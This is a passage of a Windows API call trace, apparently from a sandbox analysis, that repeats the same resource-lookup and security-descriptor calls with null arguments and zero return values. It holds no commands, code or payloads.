(hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.005] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.005] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.005] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.005] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.005] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.005] LockResource (hResData=0x0) returned 0x0 [0070.005] FreeResource (hResData=0x0) returned 0 [0070.005] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.005] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.006] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.006] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.006] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.006] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.006] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.006] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.006] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.006] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.006] LockResource (hResData=0x0) returned 0x0 [0070.006] FreeResource (hResData=0x0) returned 0 [0070.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.007] LockResource (hResData=0x0) returned 0x0 [0070.007] FreeResource (hResData=0x0) returned 0 [0070.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.008] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.008] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.008] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.008] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.008] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.008] LockResource (hResData=0x0) returned 0x0 [0070.008] FreeResource (hResData=0x0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.009] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.009] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.009] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.009] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.009] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.009] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.009] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.009] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.009] LockResource (hResData=0x0) returned 0x0 [0070.009] FreeResource (hResData=0x0) returned 0 [0070.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.010] FreeResource (hResData=0x0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.010] FreeResource (hResData=0x0) returned 0 [0070.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.010] FreeResource (hResData=0x0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.010] FreeResource (hResData=0x0) returned 0 [0070.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.010] FreeResource (hResData=0x0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.010] FreeResource (hResData=0x0) returned 0 [0070.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.010] FreeResource (hResData=0x0) returned 0 [0070.010] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.010] LockResource (hResData=0x0) returned 0x0 [0070.011] FreeResource (hResData=0x0) returned 